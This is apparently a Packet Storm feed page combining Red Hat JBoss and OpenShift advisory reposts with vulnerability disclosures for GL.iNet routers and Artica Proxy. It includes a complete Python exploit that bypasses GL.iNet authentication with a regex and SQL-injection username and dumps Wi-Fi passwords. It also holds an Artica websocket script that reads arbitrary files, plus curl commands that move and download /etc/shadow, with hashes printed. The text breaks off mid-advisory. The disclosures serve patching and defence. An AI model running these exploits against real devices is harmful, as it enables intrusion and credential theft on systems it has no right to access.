Red Hat Security Advisory 2024-1192-03 - An update is now available for Red Hat JBoss Enterprise Application Platform 8.0 for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link in the References section. Issues addressed include denial of service and file overwrite vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1192.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: Red Hat JBoss Enterprise Application Platform 8.0.1 security update  
Advisory ID:        RHSA-2024:1192-03  
Product:            Red Hat JBoss Enterprise Application Platform  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1192  
Issue date:         2024-03-06  
Revision:           03  
CVE Names:          CVE-2023-4043  
====================================================================

Summary: 

An update is now available for Red Hat JBoss Enterprise Application Platform 8.0 for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat JBoss Enterprise Application Platform 8 is a platform for Java applications based on the WildFly application runtime. This release of Red Hat JBoss Enterprise Application Platform 8.0.1 serves as a replacement for Red Hat JBoss Enterprise Application Platform 8.0.0, and includes bug fixes and enhancements. See the Red Hat JBoss Enterprise Application Platform 8.0.0 Release Notes for information about the most significant bug fixes and enhancements included in this release.

Security Fix(es):

* jgit: arbitrary file overwrite (CVE-2023-4759)

* sshd-common: apache-mina-sshd: information exposure in SFTP server implementations (CVE-2023-35887)

* parsson: Denial of Service due to large number parsing (CVE-2023-4043)

* apache-sshd: ssh: Prefix truncation attack on Binary Packet Protocol (CVE-2023-48795)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

CVEs:

CVE-2023-4043

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/8.0/  
https://bugzilla.redhat.com/show_bug.cgi?id=2238614  
https://bugzilla.redhat.com/show_bug.cgi?id=2240036  
https://bugzilla.redhat.com/show_bug.cgi?id=2254210  
https://bugzilla.redhat.com/show_bug.cgi?id=2254594  
https://issues.redhat.com/browse/JBEAP-26209

Red Hat Security Advisory 2024-1192-03

Red Hat Security Advisory 2024-1037-03 - Red Hat OpenShift Container Platform release 4.13.36 is now available with updates to packages and images that fix several bugs and add enhancements.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1037.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.13.36 bug fix and security update  
Advisory ID:        RHSA-2024:1037-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1037  
Issue date:         2024-03-06  
Revision:           03  
CVE Names:          CVE-2023-39325  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.13.36 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.13.

Red Hat Product Security has rated this update as having a security impact of  Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.13.36. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHBA-2024:1039

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

Security Fix(es):

* golang: net/http, x/net/http2: rapid stream resets can cause excessive  
work (CVE-2023-39325)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.  
All OpenShift Container Platform 4.13 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

Solution:

CVEs:

CVE-2023-39325

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003  
https://bugzilla.redhat.com/show_bug.cgi?id=2243296  
https://issues.redhat.com/browse/OCPBUGS-23501  
https://issues.redhat.com/browse/OCPBUGS-24353  
https://issues.redhat.com/browse/OCPBUGS-27406  
https://issues.redhat.com/browse/OCPBUGS-28630  
https://issues.redhat.com/browse/OCPBUGS-29670  
https://issues.redhat.com/browse/OCPBUGS-29674  
https://issues.redhat.com/browse/OCPBUGS-29725  
https://issues.redhat.com/browse/OCPBUGS-29728  
https://issues.redhat.com/browse/OCPBUGS-29766  
https://issues.redhat.com/browse/OCPBUGS-6208

Red Hat Security Advisory 2024-1037-03

Red Hat Security Advisory 2024-0281-03 - Secondary Scheduler Operator for Red Hat OpenShift 1.2.1 for RHEL 9. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0281.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: Secondary Scheduler Operator for Red Hat OpenShift 1.2.1 for RHEL 9  
Advisory ID:        RHSA-2024:0281-03  
Product:            Openshift Secondary Scheduler Operator  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0281  
Issue date:         2024-03-06  
Revision:           03  
CVE Names:          CVE-2023-39326  
====================================================================

Summary: 

Secondary Scheduler Operator for Red Hat OpenShift 1.2.1 for RHEL 9

An update for secondary-scheduler-operator-bundle-container and secondary-scheduler-operator-container is now available for OSSO-1.2.1-RHEL-9.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The Secondary Scheduler Operator for Red Hat OpenShift is an optional  
operator that makes it possible to deploy a secondary scheduler by  
providing a scheduler image. You can run a scheduler with custom  
plugins without applying additional manifests, such as cluster roles  
and deployments.

Security Fix(es):

* golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326)

* golang: crypto/tls: Timing Side Channel attack in RSA based TLS key exchanges. (CVE-2023-45287)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-39326

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2253193  
https://bugzilla.redhat.com/show_bug.cgi?id=2253330  
https://issues.redhat.com/browse/OCPBUGS-23328  
https://issues.redhat.com/browse/OCPBUGS-25130  
https://issues.redhat.com/browse/OCPBUGS-28584  
https://issues.redhat.com/browse/WRKLDS-899

Red Hat Security Advisory 2024-0281-03

GliNet with firmware version 4.x suffers from an authentication bypass vulnerability. Other firmware versions may also be affected.

DZONERZY Security Research

GLiNet: Router Authentication Bypass

========================================================================  
Contents  
========================================================================

1. Overview  
2. Detailed Description  
3. Exploit  
4. Timeline

========================================================================  
1. Overview  
========================================================================

CVE-2023-46453 is a remote authentication bypass vulnerability in the web  
interface of GLiNet routers running firmware versions 4.x and up. The  
vulnerability allows an attacker to bypass authentication and gain access  
to the router's web interface.

========================================================================  
2. Detailed Description  
========================================================================

The vulnerability is caused by a lack of proper authentication checks in  
/usr/sbin/gl-ngx-session file. The file is responsible for authenticating  
users to the web interface. The authentication is in different stages.

Stage 1:

During the first stage the user send a request to the challenge rcp  
endpoint. The endpoint returns a random nonce value used later in the  
authentication process.

Stage 2:

During the second stage the user sends a request to the login rcp endpoint  
with the username and the encrypted password. The encrypted password is  
calculated by the following formula:

md5(username + crypt(password) + nonce)

The crypt function is the standard unix crypt function.

The vulnerability lies in the fact that the username is not sanitized  
properly before being passed to the login_test function in the lua script.

------------------------------------------------------------------------  
local function login_test(username, hash)  
    if not username or username == "" then return false end

    for l in io.lines("/etc/shadow") do  
        local pw = l:match('^' .. username .. ':([^:]+)')  
        if pw then  
            for nonce in pairs(nonces) do  
                if utils.md5(table.concat({username, pw, nonce}, ":")) ==  
hash then  
                    nonces[nonce] = nil  
                    nonce_cnt = nonce_cnt - 1  
                    return true  
                end  
            end  
            return false  
        end  
    end

    return false  
end  
------------------------------------------------------------------------

This script check the username against the /etc/shadow file. If the username  
is found in the file the script will extract the password hash and compare  
it to the hash sent by the user. If the hashes match the user is  
authenticated.

The issue is that the username is not sanitized properly before being  
concatenated with the regex. This allows an attacker to inject a regex into  
the username field and modify the final behavior of the regex.

for instance, the following username will match the userid of the root user:

root:[^:]+:[^:]+ will become root:[^:]+:[^:]+:([^:]+)

This will match the "root:" string and then any character until the next ":"  
character. This will cause the script skip the password and return the  
user id instead.

Since the user id of the root user is always 0, the script will always  
return:

md5("root:[^:]+:[^:]+" + "0" + nonce)

Since this value is always the same, the attacker can simply send the known  
hash value to the login rcp endpoint and gain access to the web interface.

Anyway this approach won't work as expected since later in the code inside  
the  
this check appear:

------------------------------------------------------------------------  
    local aclgroup = db.get_acl_by_username(username)

    local sid = utils.generate_id(32)

    sessions[sid] = {  
        username = username,  
        aclgroup = aclgroup,  
        timeout = time_now() + session_timeout  
    }  
------------------------------------------------------------------------

The username which is now our custom regex will be passed to the  
get_acl_by_username  
function. This function will check the username against a database and  
return the aclgroup associated with the username.  
If the username is not found in the database the function will return nil,  
thus causing attack to fail.

By checking the code we can see that the get_acl_by_username function is  
actually appending our raw string to a query and then executing it.  
This means that we can inject a sql query into the username field and  
make it return a valid aclgroup.

------------------------------------------------------------------------  
M.get_acl_by_username = function(username)  
    if username == "root" then return "root" end

    local db = sqlite3.open(DB)  
    local sql = string.format("SELECT acl FROM account WHERE username =  
'%s'", username)

    local aclgroup = ""

    for a in db:rows(sql) do  
        aclgroup = a[1]  
    end

    db:close()

    return aclgroup  
end  
------------------------------------------------------------------------

Using this payload we were able to craft a username which is both a valid  
regex and a valid sql query:

roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+

this will make the sql query become:

SELECT acl FROM account WHERE username = 'roo[^'union selecT  
char(114,111,111,116)--]:[^:]+:[^:]+'

which will return the aclgroup of the root user (root).

========================================================================  
3. Exploit  
========================================================================

------------------------------------------------------------------------  
# Exploit Title: [CVE-2023-46453] GL.iNet - Authentication Bypass  
# Date: 18/10/2023  
# Exploit Author: Daniele 'dzonerzy' Linguaglossa  
# Vendor Homepage: https://www.gl-inet.com/  
# Vulnerable Devices:  
#   GL.iNet GL-MT3000 (4.3.7)  
#   GL.iNet GL-AR300M(4.3.7)  
#   GL.iNet GL-B1300 (4.3.7)  
#   GL.iNet GL-AX1800 (4.3.7)  
#   GL.iNet GL-AR750S (4.3.7)  
#   GL.iNet GL-MT2500 (4.3.7)  
#   GL.iNet GL-AXT1800 (4.3.7)  
#   GL.iNet GL-X3000 (4.3.7)  
#   GL.iNet GL-SFT1200 (4.3.7)  
#   And many more...  
# Version: 4.3.7  
# Firmware Release Date: 2023/09/13  
# CVE: CVE-2023-46453

from urllib.parse import urlparse  
import requests  
import hashlib  
import random  
import sys

def exploit(url):  
    try:  
        requests.packages.urllib3.disable_warnings()  
        host = urlparse(url)  
        url = f"{host.scheme}://{host.netloc}/rpc"  
        print(f"[*] Target: {url}")  
        print("[*] Retrieving nonce...")  
        nonce = requests.post(url, verify=False, json={  
            "jsonrpc": "2.0",  
            "id": random.randint(1000, 9999),  
            "method": "challenge",  
            "params": {"username": "root"}  
        }, timeout=5).json()  
        if "result" in nonce and "nonce" in nonce["result"]:  
            print(f"[*] Got nonce: {nonce['result']['nonce']} !")  
        else:  
            print("[!] Nonce not found, exiting... :(")  
            sys.exit(1)  
        print("[*] Retrieving authentication token for root...")  
        md5_hash = hashlib.md5()  
        md5_hash.update(  
            f"roo[^'union selecT  
char(114,111,111,116)--]:[^:]+:[^:]+:0:{nonce['result']['nonce']}".encode())  
        password = md5_hash.hexdigest()  
        token = requests.post(url, verify=False, json={  
            "jsonrpc": "2.0",  
            "id": random.randint(1000, 9999),  
            "method": "login",  
            "params": {  
                "username": f"roo[^'union selecT  
char(114,111,111,116)--]:[^:]+:[^:]+",  
                "hash": password  
            }  
        }, timeout=5).json()  
        if "result" in token and "sid" in token["result"]:  
            print(f"[*] Got token: {token['result']['sid']} !")  
        else:  
            print("[!] Token not found, exiting... :(")  
            sys.exit(1)  
        print("[*] Checking if we are root...")  
        check = requests.post(url, verify=False, json={  
            "jsonrpc": "2.0",  
            "id": random.randint(1000, 9999),  
            "method": "call",  
            "params": [token["result"]["sid"], "system", "get_status", {}]  
        }, timeout=5).json()  
        if "result" in check and "wifi" in check["result"]:  
            print("[*] We are authenticated as root! :)")  
            print("[*] Below some info:")  
            for wifi in check["result"]["wifi"]:  
                print(f"[*] --------------------")  
                print(f"[*] SSID: {wifi['ssid']}")  
                print(f"[*] Password: {wifi['passwd']}")  
                print(f"[*] Band: {wifi['band']}")  
            print(f"[*] --------------------")  
        else:  
            print("[!] Something went wrong, exiting... :(")  
            sys.exit(1)  
    except requests.exceptions.Timeout:  
        print("[!] Timeout error, exiting... :(")  
        sys.exit(1)  
    except KeyboardInterrupt:  
        print(f"[!] Something went wrong: {e}")

if __name__ == "__main__":  
    print("GL.iNet Auth Bypass\n")  
    if len(sys.argv) < 2:  
        print(  
            f"Usage: python3 {sys.argv[1]} https://target.com",  
file=sys.stderr)  
        sys.exit(0)  
    else:  
        exploit(sys.argv[1])  
------------------------------------------------------------------------

========================================================================  
4. Timeline  
========================================================================

2023/09/13 - Vulnerability discovered  
2023/09/14 - CVE-2023-46453 requested  
2023/09/20 - Vendor contacted  
2023/09/20 - Vendor replied  
2023/09/30 - CVE-2023-46453 assigned  
2023/11/08 - Vulnerability patched and fix released

GliNet 4.x Authentication Bypass

Services that are running and bound to the loopback interface on the Artica Proxy version 4.50 are accessible through the proxy service. In particular, the tailon service is running as the root user, is bound to the loopback interface, and is listening on TCP port 7050. Using the tailon service, the contents of any file on the Artica Proxy can be viewed.

    KL-001-2024-004: Artica Proxy Loopback Services Remotely Accessible UnauthenticatedTitle: Artica Proxy Loopback Services Remotely Accessible UnauthenticatedAdvisory ID: KL-001-2024-004Publication Date: 2024.03.05Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-004.txt1. Vulnerability Details      Affected Vendor: Artica      Affected Product: Artica Proxy      Affected Version: 4.50      Platform: Debian 10 LTS      CWE Classification: CWE-288: Authentication Bypass Using an                          Alternate Path or Channel, CWE-552: Files                          or Directories Accessible to External                          Parties      CVE ID: CVE-2024-20562. Vulnerability Description     Services that are running and bound to the loopback     interface on the Artica Proxy are accessible through     the proxy service. In particular, the "tailon" service is     running as the root user, is bound to the loopback interface,     and is listening on TCP port 7050. Security issues associated     with exposing this network service are documented at     https://github.com/gvalkov/tailon#security. Using the tailon     service, the contents of any file on the Artica Proxy can be     viewed.3. Technical Description      root@artica-450:~# netstat -anop | grep LIST | egrep '127.0.|::' | awk '{ print $4 "   " $7 }'      127.0.0.1:57585         <PID>/(squid-1)      127.0.0.1:8562          <PID>/nginx:      127.0.0.1:884           <PID>/sshd      127.0.0.55:53           <PID>/dnscache      127.0.0.1:9143          <PID>/[authlog]      127.0.0.1:5432          <PID>/postgres      127.0.0.1:2521          <PID>/artica-smtpd      127.0.0.1:2874          <PID>/monit      127.0.0.1:19102         <PID>/[cache-tail]      127.0.0.1:3333          <PID>/go-shield-serv      127.0.0.1:389           <PID>/slapd      127.0.0.1:3334          <PID>/go-exec      127.0.0.1:7050          <PID>/tailon      :::4949                 <PID>/perl      :::9025                 <PID>/[error-page]      root@artica-450:~# ps -efww | grep tailon      root      2765     1  0 Nov07 ?        00:01:29 /sbin/tailon --allow-download --config /etc/tailon/config.toml alias=Syslog,group=System,/var/log/syslog alias=Daemons,group=Services,/var/log/*.log alias=Proxy,group=Service-Proxy,/var/log/squid/*.log alias=Nginx,group=Service-Web,/var/log/nginx/*.log4. Mitigation and Remediation Recommendation      No response from vendor; no remediation available.5. Credit      This vulnerability was discovered by Jim Becher and Jaggar      Henry of KoreLogic, Inc.6. Disclosure Timeline      2023.12.18 - KoreLogic requests vulnerability contact and                   secure communication method from Artica.      2023.12.18 - Artica Support issues automated ticket #1703011342                   promising follow-up from a human.      2024.01.10 - KoreLogic again requests vulnerability contact and                   secure communication method from Artica.      2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from                   mail.articatech.com with response                   "Client host rejected: Go Away!"      2024.01.11 - KoreLogic requests vulnerability contact and                   secure communication method via                   https://www.articatech.com/ 'Contact Us' web form.      2024.01.23 - KoreLogic requests CVE from MITRE.      2024.01.23 - MITRE issues automated ticket #1591692 promising                   follow-up from a human.      2024.02.01 - 30 business days have elapsed since KoreLogic                   attempted to contact the vendor.      2024.02.06 - KoreLogic requests update on CVE from MITRE.      2024.02.15 - KoreLogic requests update on CVE from MITRE.      2024.02.22 - KoreLogic reaches out to alternate CNA for                   CVE identifiers.      2024.02.26 - 45 business days have elapsed since KoreLogic                   attempted to contact the vendor.      2024.02.29 - Vulnerability details presented to AHA!                   (takeonme.org) by proxy.      2024.03.01 - AHA! issues CVE-2024-2056 to track this                   vulnerability.      2024.03.05 - KoreLogic public disclosure.7. Proof of Concept      $ python3 exploit.py 192.168.2.139 /etc/shadow      1701282189.746     35 192.168.2.99 TCP_TUNNEL/200 3496 CONNECT 0.0.0.0:7050 - HIER_DIRECT/0.0.0.0:7050 - mac=\\\"e0:d5:5e:0a:d3:24\\\" category:%200%0D%0Acategory-name:%20Unknown%0D%0Aclog:%20cinfo:0-Unknown;%0D%0A exterr=\\\"-|-\\\"root:$6$Pvb1ivrg5oo.a/om$xtRvfpBBSZgPt/fDjHzw9k9e.jxWaY.LPOqnqHJcSBuQMxtjtG6pBBMMf1Z6D4jtN6kDSB3h5FufJ9DuXv.7R0:19507:0:99999:7:::      daemon:*:19507:0:99999:7:::      bin:*:19507:0:99999:7:::      sys:*:19507:0:99999:7:::      sync:*:19507:0:99999:7:::      games:*:19507:0:99999:7:::      man:*:19507:0:99999:7:::      ...      ...      ### exploit.py      import re      import sys      import json      import websocket      """      run `pip install websocket-client` before executing.      """      ARTICA_PROXY_IP = sys.argv[1] if len(sys.argv) >= 2 else '172.17.0.1'      FILE_TO_READ    = sys.argv[2] if len(sys.argv) >= 3 else '/etc/passwd'      WEBSOCKET_URI   = 'ws://0.0.0.0:7050/tailon/ws/1337/korelogic/websocket'      payload = {          'command': 'sed',          'script':  f'r {FILE_TO_READ}',          'entry': {              'path':   '/var/log/squid/access.log',              'alias':  'Proxy/access.log',          },          'nlines': 1      }      websocket_message = json.dumps([json.dumps(payload)])      ws = websocket.WebSocket()      ws.connect(WEBSOCKET_URI, http_proxy_host=ARTICA_PROXY_IP, http_proxy_port='8085', proxy_type='http')      ws.send(websocket_message)      reading = True      while reading:          data = re.search(r'a\["\[\\"o\\",\\"(.*)\\"]"]$', ws.recv())          if data: print(data.group(1))      ws.close()The contents of this advisory are copyright(c) 2024KoreLogic, Inc. and are licensed under a Creative CommonsAttribution Share-Alike 4.0 (United States) License:http://creativecommons.org/licenses/by-sa/4.0/KoreLogic, Inc. is a founder-owned and operated company with aproven track record of providing security services to entitiesranging from Fortune 500 to small and mid-sized companies. Weare a highly skilled team of senior security consultants doingby-hand security assessments for the most important networks inthe U.S. and around the world. We are also developers of varioustools and resources aimed at helping the security community.https://www.korelogic.com/about-korelogic.htmlOur public vulnerability disclosure policy is available at:https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt

Artica Proxy 4.50 Loopback Service Disclosure

The Rich Filemanager feature of Artica Proxy versions 4.40 and 4.50 provides a web-based interface for file management capabilities. When the feature is enabled, it does not require authentication by default, and runs as the root user. This provides an unauthenticated attacker complete access to the file system.

    KL-001-2024-003: Artica Proxy Unauthenticated File Manager VulnerabilityTitle: Artica Proxy Unauthenticated File Manager VulnerabilityAdvisory ID: KL-001-2024-003Publication Date: 2024.03.05Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-003.txt1. Vulnerability Details      Affected Vendor: Artica      Affected Product: Artica Proxy      Affected Version: 4.40 and 4.50      Platform: Debian 10 LTS      CWE Classification: CWE-288: Authentication Bypass Using an                          Alternate Path or Channel, CWE-552: Files                          or Directories Accessible to External                          Parties      CVE ID: CVE-2024-20552. Vulnerability Description      The "Rich Filemanager" feature of Artica Proxy provides a      web-based interface for file management capabilities. When      the feature is enabled, it does not require authentication by      default, and runs as the root user.3. Technical Description      The Artica Proxy can be installed with a small amount of      "Features" enabled. Within the administrative web interface,      additional features can be installed, enabled, and disabled. The      "Rich Filemanager" feature is disabled by default. Enabling      this feature will spawn a listener on port 5000/tcp bound to      0.0.0.0. By default, when this feature is enabled, authentication      is not required to access the web interface. The "Rich      Filemanager" runs as the root user. This provides an      unauthenticated attacker complete access to the file system.        root@artica:~# ps -efww | grep -i File        root      1888  1885  0 09:13 ?        00:00:00 php-fpm: pool RICHFILEMANAGER        root      1889  1885  0 09:13 ?        00:00:00 php-fpm: pool RICHFILEMANAGER      This can be exploited by an attacker to add entries in to      /etc/shadow, /etc/passwd, and /etc/ssh/sshd_config to create      an additional root-level account that has the ability to SSH      in to the system.4. Mitigation and Remediation Recommendation      No response from vendor. Rich Filemanager feature is disabled      by default. Leave it that way.5. Credit      This vulnerability was discovered by Jim Becher of KoreLogic,      Inc.6. Disclosure Timeline      2023.12.18 - KoreLogic requests vulnerability contact and                   secure communication method from Artica.      2023.12.18 - Artica Support issues automated ticket #1703011342                   promising follow-up from a human.      2024.01.10 - KoreLogic again requests vulnerability contact and                   secure communication method from Artica.      2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from                   mail.articatech.com with response                   "Client host rejected: Go Away!"      2024.01.11 - KoreLogic requests vulnerability contact and                   secure communication method via                   https://www.articatech.com/ 'Contact Us' web form.      2024.01.23 - KoreLogic requests CVE from MITRE.      2024.01.23 - MITRE issues automated ticket #1591692 promising                   follow-up from a human.      2024.02.01 - 30 business days have elapsed since KoreLogic                   attempted to contact the vendor.      2024.02.06 - KoreLogic requests update on CVE from MITRE.      2024.02.15 - KoreLogic requests update on CVE from MITRE.      2024.02.22 - KoreLogic reaches out to alternate CNA for                   CVE identifiers.      2024.02.26 - 45 business days have elapsed since KoreLogic                   attempted to contact the vendor.      2024.02.29 - Vulnerability details presented to AHA!                   (takeonme.org) by proxy.      2024.03.01 - AHA! issues CVE-2024-2055 to track this                   vulnerability.      2024.03.05 - KoreLogic public disclosure.7. Proof of Concept      Step 1: Move /etc/shadow to /tmp/shadow      $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Connection: close' $'http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885542096&mode=move&old=%2Fetc%2Fshadow&new=%2Ftmp%2F&_=1700868631198'{"data":{"id":"\/tmp\/shadow","type":"file","attributes":{"name":"shadow","path":"\/tmp\/shadow","readable":1,"writable":1,"created":"","modified":"24 Nov 2023 15:55","timestamp":1700862914,"height":0,"width":0,"size":"2037"}}}      Step 2: Download /tmp/shadow      $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'Pragma: no-cache' -H $'Cache-Control: no-cache' $'http://192.168.2.139:5000/connectors/php/filemanager.php?mode=download&path=%2Ftmp%2Fshadow&time=1700885590870'root:$6$Pvb1ivrg5oo.a/om$xtRvfpBBSZgPt/fDjHzw9k9e.jxWaY.LPOqnqHJcSBuQMxtjtG6pBBMMf1Z6D4jtN6kDSB3h5FufJ9DuXv.7R0:19507:0:99999:7:::      daemon:*:19507:0:99999:7:::      bin:*:19507:0:99999:7:::      sys:*:19507:0:99999:7:::      sync:*:19507:0:99999:7:::      games:*:19507:0:99999:7:::      man:*:19507:0:99999:7:::      lp:*:19507:0:99999:7:::      mail:*:19507:0:99999:7:::      news:*:19507:0:99999:7:::      uucp:*:19507:0:99999:7:::      proxy:*:19507:0:99999:7:::      www-data:*:19507:0:99999:7:::      backup:*:19507:0:99999:7:::      list:*:19507:0:99999:7:::      irc:*:19507:0:99999:7:::      gnats:*:19507:0:99999:7:::      nobody:*:19507:0:99999:7:::      _apt:*:19507:0:99999:7:::      systemd-timesync:*:19507:0:99999:7:::      systemd-network:*:19507:0:99999:7:::      systemd-resolve:*:19507:0:99999:7:::      messagebus:*:19507:0:99999:7:::      quagga:*:19507:0:99999:7:::      apt-mirror:*:19507:0:99999:7:::      privoxy:*:19507:0:99999:7:::      ntp:*:19507:0:99999:7:::      redsocks:!:19507:0:99999:7:::      prads:*:19507:0:99999:7:::      freerad:*:19507:0:99999:7:::      vnstat:*:19507:0:99999:7:::      stunnel4:!:19507:0:99999:7:::      sshd:*:19507:0:99999:7:::      vde2-net:*:19507:0:99999:7:::      memcache:!:19507:0:99999:7:::      davfs2:*:19507:0:99999:7:::      ziproxy:!:19507:0:99999:7:::      proftpd:!:19507:0:99999:7:::      ftp:*:19507:0:99999:7:::      mosquitto:*:19507:0:99999:7:::      openldap:!:19507:0:99999:7:::      munin:*:19507:0:99999:7:::      msmtp:*:19507:0:99999:7:::      Debian-snmp:!:19507:0:99999:7:::      opendkim:*:19507:0:99999:7:::      avahi:*:19507:0:99999:7:::      glances:*:19507:0:99999:7:::      ArticaStats:!:19507:0:99999:7:::      netdata:!:19507:0:99999:7:::      mysql:!:19507:0:99999:7:::      postfix:!:19507:0:99999:7:::      squid:!:19507:0:99999:7:::      smokeping:!:19507:0:99999:7:::      unbound:!:19645:0:99999:7:::      Step 3: Move /tmp/shadow back to /etc/shadow as not to create a DoS condition      $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Connection: close' $'http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885798719&mode=move&old=%2Ftmp%2Fshadow&new=%2Fetc%2F&_=1700868631208'{"data":{"id":"\/etc\/shadow","type":"file","attributes":{"name":"shadow","path":"\/etc\/shadow","readable":0,"writable":1,"created":"","modified":"24 Nov 2023 15:55","timestamp":1700862914,"height":0,"width":0,"size":0}}}The contents of this advisory are copyright(c) 2024KoreLogic, Inc. and are licensed under a Creative CommonsAttribution Share-Alike 4.0 (United States) License:http://creativecommons.org/licenses/by-sa/4.0/KoreLogic, Inc. is a founder-owned and operated company with aproven track record of providing security services to entitiesranging from Fortune 500 to small and mid-sized companies. Weare a highly skilled team of senior security consultants doingby-hand security assessments for the most important networks inthe U.S. and around the world. We are also developers of varioustools and resources aimed at helping the security community.https://www.korelogic.com/about-korelogic.htmlOur public vulnerability disclosure policy is available at:https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt

Artica Proxy 4.40 / 4.50 Authentication Bypass / Privilege Escalation

The Artica Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the www-data user. Version 4.50 is affected.

KL-001-2024-002: Artica Proxy Unauthenticated PHP Deserialization Vulnerability

Title: Artica Proxy Unauthenticated PHP Deserialization Vulnerability  
Advisory ID: KL-001-2024-002  
Publication Date: 2024.03.05  
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-002.txt

1. Vulnerability Details

      Affected Vendor: Artica  
      Affected Product: Artica Proxy  
      Affected Version: 4.50  
      Platform: Debian 10 LTS  
      CWE Classification: CWE-502 Deserialization of Untrusted Data  
      CVE ID: CVE-2024-2054

2. Vulnerability Description

      The Artica Proxy administrative web application will deserialize  
      arbitrary PHP objects supplied by unauthenticated users and  
      subsequently enable code execution as the "www-data" user.

3. Technical Description

      Prior to authentication, a user can send an HTTP request  
      to the "/wizard/wiz.wizard.progress.php" endpoint. This  
      endpoint processes the "build-js" query parameter by base64  
      decoding the provided value and then calling the "unserialize"  
      PHP function with the decoded value as input.

      Code snippet from "wiz.wizard.progress.php":

        if(isset($_GET["build-js"])){buildjs();exit;}  
        ...  
        $ARRAY=unserialize(base64_decode($_GET["build-js"]));

      To exploit this vulnerability, a user can leverage the  
      installed "Net_DNS2" library autoloader to instantiate the  
